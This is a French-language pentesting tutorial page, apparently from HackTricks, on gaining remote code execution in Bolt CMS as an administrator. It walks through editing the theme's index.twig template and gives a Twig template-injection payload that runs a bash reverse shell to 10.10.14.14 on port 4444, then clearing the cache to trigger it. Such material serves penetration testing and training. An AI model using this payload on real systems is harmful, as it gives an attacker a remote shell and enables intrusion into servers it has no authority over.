# Bolt CMS

{{#include ../../banners/hacktricks-training.md}}

## RCE

Après vous être connecté en tant qu'administrateur (allez à /bot pour accéder à l'invite de connexion), vous pouvez obtenir RCE dans Bolt CMS :

- Sélectionnez `Configuration` -> `View Configuration` -> `Main Configuration` ou allez à l'URL `/bolt/file-edit/config?file=/bolt/config.yaml`
- Vérifiez la valeur du thème

<figure><img src="../../images/image (771).png" alt=""><figcaption></figcaption></figure>

- Sélectionnez `File management` -> `View & edit templates`
- Sélectionnez la base de thème trouvée dans l'étape précédente (`base-2021` dans ce cas) et sélectionnez `index.twig`
- Dans mon cas, cela se trouve à l'URL /bolt/file-edit/themes?file=/base-2021/index.twig
- Mettez votre payload dans ce fichier via [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/index.html#twig-php), comme : `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
- Et enregistrez les modifications

<figure><img src="../../images/image (948).png" alt=""><figcaption></figcaption></figure>

- Videz le cache dans `Maintenance` -> `Clear the cache`
- Accédez à nouveau à la page en tant qu'utilisateur régulier, et le payload devrait être exécuté

{{#include ../../banners/hacktricks-training.md}}